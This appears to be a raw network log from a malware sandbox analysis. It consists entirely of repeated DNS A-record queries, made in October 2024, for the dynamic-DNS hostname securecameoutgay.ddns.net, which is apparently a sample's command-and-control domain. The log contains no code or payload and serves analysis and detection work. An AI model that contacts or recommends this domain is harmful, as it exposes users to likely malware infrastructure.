                                                    Oct 12, 2024 23:06:15.108535051 CEST192.168.2.148.8.8.80xb512Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.115147114 CEST192.168.2.148.8.8.80xb512Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.122181892 CEST192.168.2.148.8.8.80xb512Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.128761053 CEST192.168.2.148.8.8.80xb512Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.135370970 CEST192.168.2.148.8.8.80xb512Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.142285109 CEST192.168.2.148.8.8.80xe0e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.149065971 CEST192.168.2.148.8.8.80xe0e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.155704021 CEST192.168.2.148.8.8.80xe0e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.162363052 CEST192.168.2.148.8.8.80xe0e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.168960094 CEST192.168.2.148.8.8.80xe0e5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.175931931 CEST192.168.2.148.8.8.80x1a8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.182749987 CEST192.168.2.148.8.8.80x1a8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.196403027 CEST192.168.2.148.8.8.80x1a8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.203176022 CEST192.168.2.148.8.8.80x1a8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.209692955 CEST192.168.2.148.8.8.80x1a8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.216294050 CEST192.168.2.148.8.8.80xa4dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.223165035 CEST192.168.2.148.8.8.80xa4dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.229502916 CEST192.168.2.148.8.8.80xa4dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.236059904 CEST192.168.2.148.8.8.80xa4dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.243835926 CEST192.168.2.148.8.8.80xa4dcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.251027107 CEST192.168.2.148.8.8.80x896aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.258408070 CEST192.168.2.148.8.8.80x896aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.265633106 CEST192.168.2.148.8.8.80x896aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.272727966 CEST192.168.2.148.8.8.80x896aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.279794931 CEST192.168.2.148.8.8.80x896aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.286983013 CEST192.168.2.148.8.8.80x3913Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.293565035 CEST192.168.2.148.8.8.80x3913Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.300246000 CEST192.168.2.148.8.8.80x3913Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.307495117 CEST192.168.2.148.8.8.80x3913Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.314608097 CEST192.168.2.148.8.8.80x3913Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.321275949 CEST192.168.2.148.8.8.80x4c56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.328198910 CEST192.168.2.148.8.8.80x4c56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.335016966 CEST192.168.2.148.8.8.80x4c56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.341670990 CEST192.168.2.148.8.8.80x4c56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.348737001 CEST192.168.2.148.8.8.80x4c56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.355355024 CEST192.168.2.148.8.8.80x630aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.361720085 CEST192.168.2.148.8.8.80x630aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.368288994 CEST192.168.2.148.8.8.80x630aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.375056982 CEST192.168.2.148.8.8.80x630aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.381968975 CEST192.168.2.148.8.8.80x630aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.388788939 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.395220041 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.401825905 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.408407927 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.415230989 CEST192.168.2.148.8.8.80x57a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.422086954 CEST192.168.2.148.8.8.80xad38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.428797007 CEST192.168.2.148.8.8.80xad38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.435403109 CEST192.168.2.148.8.8.80xad38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.442066908 CEST192.168.2.148.8.8.80xad38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.448641062 CEST192.168.2.148.8.8.80xad38Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.455331087 CEST192.168.2.148.8.8.80xa27aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.461850882 CEST192.168.2.148.8.8.80xa27aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.468678951 CEST192.168.2.148.8.8.80xa27aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.475327015 CEST192.168.2.148.8.8.80xa27aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.481985092 CEST192.168.2.148.8.8.80xa27aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.488645077 CEST192.168.2.148.8.8.80xaca4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.495312929 CEST192.168.2.148.8.8.80xaca4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.502079964 CEST192.168.2.148.8.8.80xaca4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.508897066 CEST192.168.2.148.8.8.80xaca4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.515405893 CEST192.168.2.148.8.8.80xaca4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.522177935 CEST192.168.2.148.8.8.80x5392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.528913975 CEST192.168.2.148.8.8.80x5392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.536058903 CEST192.168.2.148.8.8.80x5392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.544003963 CEST192.168.2.148.8.8.80x5392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.551408052 CEST192.168.2.148.8.8.80x5392Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.558732986 CEST192.168.2.148.8.8.80xe87aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.565622091 CEST192.168.2.148.8.8.80xe87aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.573076010 CEST192.168.2.148.8.8.80xe87aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.580765963 CEST192.168.2.148.8.8.80xe87aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.588156939 CEST192.168.2.148.8.8.80xe87aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.595038891 CEST192.168.2.148.8.8.80xc03eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.601620913 CEST192.168.2.148.8.8.80xc03eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.608608961 CEST192.168.2.148.8.8.80xc03eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.615366936 CEST192.168.2.148.8.8.80xc03eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.632335901 CEST192.168.2.148.8.8.80xc03eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.639276981 CEST192.168.2.148.8.8.80x1438Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.646394968 CEST192.168.2.148.8.8.80x1438Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.653119087 CEST192.168.2.148.8.8.80x1438Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.659960985 CEST192.168.2.148.8.8.80x1438Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.666763067 CEST192.168.2.148.8.8.80x1438Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.673516989 CEST192.168.2.148.8.8.80x8793Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.680233002 CEST192.168.2.148.8.8.80x8793Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.687519073 CEST192.168.2.148.8.8.80x8793Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.694317102 CEST192.168.2.148.8.8.80x8793Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.701147079 CEST192.168.2.148.8.8.80x8793Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.707741022 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.714483976 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.721013069 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.727718115 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.734641075 CEST192.168.2.148.8.8.80xcf5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.741982937 CEST192.168.2.148.8.8.80x9495Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.749196053 CEST192.168.2.148.8.8.80x9495Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.756771088 CEST192.168.2.148.8.8.80x9495Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.764029980 CEST192.168.2.148.8.8.80x9495Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.771363974 CEST192.168.2.148.8.8.80x9495Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.778479099 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.785675049 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.792330027 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.799396992 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.806495905 CEST192.168.2.148.8.8.80xbc61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.813869953 CEST192.168.2.148.8.8.80xbd1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.820913076 CEST192.168.2.148.8.8.80xbd1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.827914953 CEST192.168.2.148.8.8.80xbd1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.834625959 CEST192.168.2.148.8.8.80xbd1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.842129946 CEST192.168.2.148.8.8.80xbd1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.849442005 CEST192.168.2.148.8.8.80xc5a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.856631994 CEST192.168.2.148.8.8.80xc5a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.864300013 CEST192.168.2.148.8.8.80xc5a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.871398926 CEST192.168.2.148.8.8.80xc5a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.878973007 CEST192.168.2.148.8.8.80xc5a4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.886398077 CEST192.168.2.148.8.8.80x26ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.893448114 CEST192.168.2.148.8.8.80x26ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.900751114 CEST192.168.2.148.8.8.80x26ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.908261061 CEST192.168.2.148.8.8.80x26ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.915868998 CEST192.168.2.148.8.8.80x26ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.923446894 CEST192.168.2.148.8.8.80x197bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.930717945 CEST192.168.2.148.8.8.80x197bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.938999891 CEST192.168.2.148.8.8.80x197bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.946120977 CEST192.168.2.148.8.8.80x197bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.953002930 CEST192.168.2.148.8.8.80x197bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.959686995 CEST192.168.2.148.8.8.80x5338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.966706038 CEST192.168.2.148.8.8.80x5338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.973889112 CEST192.168.2.148.8.8.80x5338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.981105089 CEST192.168.2.148.8.8.80x5338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.988645077 CEST192.168.2.148.8.8.80x5338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:15.996467113 CEST192.168.2.148.8.8.80xe147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.003659010 CEST192.168.2.148.8.8.80xe147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.011202097 CEST192.168.2.148.8.8.80xe147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.017930984 CEST192.168.2.148.8.8.80xe147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.025087118 CEST192.168.2.148.8.8.80xe147Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.032327890 CEST192.168.2.148.8.8.80xde30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.039711952 CEST192.168.2.148.8.8.80xde30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.046652079 CEST192.168.2.148.8.8.80xde30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.053901911 CEST192.168.2.148.8.8.80xde30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.061141968 CEST192.168.2.148.8.8.80xde30Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.068464994 CEST192.168.2.148.8.8.80x596bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.075978994 CEST192.168.2.148.8.8.80x596bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.083363056 CEST192.168.2.148.8.8.80x596bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.090852022 CEST192.168.2.148.8.8.80x596bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.097709894 CEST192.168.2.148.8.8.80x596bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.104799032 CEST192.168.2.148.8.8.80xd169Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.111991882 CEST192.168.2.148.8.8.80xd169Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.119591951 CEST192.168.2.148.8.8.80xd169Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.126596928 CEST192.168.2.148.8.8.80xd169Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.133281946 CEST192.168.2.148.8.8.80xd169Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.140304089 CEST192.168.2.148.8.8.80xa6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.146987915 CEST192.168.2.148.8.8.80xa6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.154225111 CEST192.168.2.148.8.8.80xa6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.161143064 CEST192.168.2.148.8.8.80xa6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.167922974 CEST192.168.2.148.8.8.80xa6c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.174834967 CEST192.168.2.148.8.8.80x7b3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.181531906 CEST192.168.2.148.8.8.80x7b3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.188584089 CEST192.168.2.148.8.8.80x7b3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.195008039 CEST192.168.2.148.8.8.80x7b3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.201509953 CEST192.168.2.148.8.8.80x7b3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.208237886 CEST192.168.2.148.8.8.80x68edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.214648008 CEST192.168.2.148.8.8.80x68edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.221385956 CEST192.168.2.148.8.8.80x68edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.228147030 CEST192.168.2.148.8.8.80x68edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.234739065 CEST192.168.2.148.8.8.80x68edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.241364002 CEST192.168.2.148.8.8.80xcc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.248060942 CEST192.168.2.148.8.8.80xcc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.255234957 CEST192.168.2.148.8.8.80xcc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.262070894 CEST192.168.2.148.8.8.80xcc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.268958092 CEST192.168.2.148.8.8.80xcc9bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.276220083 CEST192.168.2.148.8.8.80xa1ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.283581972 CEST192.168.2.148.8.8.80xa1ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.290925980 CEST192.168.2.148.8.8.80xa1ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.297939062 CEST192.168.2.148.8.8.80xa1ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.305056095 CEST192.168.2.148.8.8.80xa1ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.312194109 CEST192.168.2.148.8.8.80x8c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.319055080 CEST192.168.2.148.8.8.80x8c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.325839996 CEST192.168.2.148.8.8.80x8c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.333328962 CEST192.168.2.148.8.8.80x8c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.340006113 CEST192.168.2.148.8.8.80x8c27Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.346801043 CEST192.168.2.148.8.8.80x9f0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.353727102 CEST192.168.2.148.8.8.80x9f0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.360506058 CEST192.168.2.148.8.8.80x9f0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.367202997 CEST192.168.2.148.8.8.80x9f0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.375474930 CEST192.168.2.148.8.8.80x9f0bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.384927988 CEST192.168.2.148.8.8.80xf325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.394926071 CEST192.168.2.148.8.8.80xf325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.402261019 CEST192.168.2.148.8.8.80xf325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.409198999 CEST192.168.2.148.8.8.80xf325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.416111946 CEST192.168.2.148.8.8.80xf325Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.422799110 CEST192.168.2.148.8.8.80xe0f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.432332993 CEST192.168.2.148.8.8.80xe0f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
